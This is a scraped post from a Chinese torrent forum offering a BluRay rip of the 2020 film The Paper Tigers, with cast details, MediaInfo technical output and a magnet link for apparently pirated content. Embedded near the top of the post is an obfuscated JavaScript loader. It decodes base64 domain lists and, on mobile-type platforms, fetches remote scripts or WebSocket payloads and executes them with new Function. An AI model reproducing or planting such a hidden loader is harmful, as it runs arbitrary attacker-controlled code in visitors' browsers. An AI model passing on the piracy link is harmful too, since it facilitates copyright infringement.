三只老虎[中文字幕].The.Paper.Tigers.2020.1080p.BluRay.x264.DTS-迅雷下载 13.25GB

版主小s 26天前 214

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 三只老虎/三纸老虎

◎片 名 The Paper Tigers

◎年 代 2020

◎产 地 美国

◎类 别 喜剧 / 动作

◎语 言 英语

◎上映日期 2020-08-30(Fantasia International Film Festival) / 2021-05-07(美国)

◎IMDb评分 6.3/10 from 1509 users

◎IMDb链接 https://www.imdb.com/title/tt6060444/

◎豆瓣评分 6.1/10 from 308 users

◎豆瓣链接 https://movie.douban.com/subject/34847463/

◎片 长 108分钟

◎导 演 包·特兰 Quoc Bao Tran

◎编 剧 包·特兰 Quoc Bao Tran

◎主 演 朴在书 Jae Suh Park

冈本玉二 Yuji Okumoto

约书亚·萨达索 Yoshua Sudarso

袁文忠 Ron Yuan

袁之正 Roger Yuan

米凯尔·珊农·詹金斯 Mykel Shannon Jenkins

Brian Le Brian Le

Phillip Dang Phillip Dang

Andy Le Andy Le

◎标 签 喜剧 | 动作 | 功夫 | 美国 | 2020 | 黑色幽默 | 美国电影 | 美國

◎简 介

A deadbeat dad, an insurance scammer, and an MMA coach must avenge their Kung Fu master's death but first - they need to call in sick at their 9-to-5's.

  1. General

  2. Unique ID : 334687507147378820437827778762445302332 (0xFBCA781DABCEA4099F499A5B985E2A3C)

  3. Complete name : The.Paper.Tigers.2020.1080p.BluRay.x264.DTS-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 13.2 GiB

  7. Duration : 1 h 50 min

  8. Overall bit rate : 17.1 Mb/s

  9. Movie name : The Paper Tigers 2020

  10. Encoded date : UTC 2021-07-05 01:18:51

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 50 min

  25. Bit rate : 15.6 Mb/s

  26. Width : 1 920 pixels

  27. Height : 1 036 pixels

  28. Display aspect ratio : 1.85:1

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.326

  36. Stream size : 12.0 GiB (91%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=32 / lookahead_threads=8 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=20.3000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.80 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Language : English

  40. Default : Yes

  41. Forced : No


  42. Audio

  43. ID : 2

  44. ID in the original source medium : 4352 (0x1100)

  45. Format : DTS

  46. Format/Info : Digital Theater Systems

  47. Codec ID : A_DTS

  48. Duration : 1 h 50 min

  49. Bit rate mode : Constant

  50. Bit rate : 1 509 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 16 bits

  56. Compression mode : Lossy

  57. Stream size : 1.17 GiB (9%)

  58. Language : English

  59. Default : Yes

  60. Forced : No

  61. Original source medium : Blu-ray


  62. Text #1

  63. ID : 3

  64. ID in the original source medium : 4610 (0x1202)

  65. Format : PGS

  66. Muxing mode : zlib

  67. Codec ID : S_HDMV/PGS

  68. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  69. Duration : 1 h 45 min

  70. Bit rate : 35.8 kb/s

  71. Count of elements : 2813

  72. Stream size : 26.9 MiB (0%)

  73. Title : chs

  74. Language : Chinese

  75. Default : Yes

  76. Forced : No

  77. Original source medium : Blu-ray


  78. Text #2

  79. ID : 4

  80. ID in the original source medium : 4611 (0x1203)

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 44 min

  86. Bit rate : 33.4 kb/s

  87. Count of elements : 2808

  88. Stream size : 25.0 MiB (0%)

  89. Title : cht

  90. Language : Chinese

  91. Default : Yes

  92. Forced : No

  93. Original source medium : Blu-ray


  94. Text #3

  95. ID : 5

  96. ID in the original source medium : 4608 (0x1200)

  97. Format : PGS

  98. Muxing mode : zlib

  99. Codec ID : S_HDMV/PGS

  100. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  101. Duration : 1 h 46 min

  102. Bit rate : 44.9 kb/s

  103. Count of elements : 3394

  104. Stream size : 34.1 MiB (0%)

  105. Language : English

  106. Default : Yes

  107. Forced : No

  108. Original source medium : Blu-ray


  109. Menu

  110. 00:00:00.000 : Chapter 01

  111. 00:09:45.668 : Chapter 02

  112. 00:19:30.335 : Chapter 03

  113. 00:31:05.905 : Chapter 04

  114. 00:44:30.292 : Chapter 05

  115. 00:52:50.625 : Chapter 06

  116. 01:04:33.953 : Chapter 07

  117. 01:15:05.042 : Chapter 08

  118. 01:26:18.548 : Chapter 09

  119. 01:37:38.936 : Chapter 10

  120. 01:47:01.915 : Chapter 11


TAGS 动作 喜剧

磁力链:
  • magnet:?xt=urn:btih:E4D06416F08A64C5A0A74AC0F7C2406F4C93C983
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回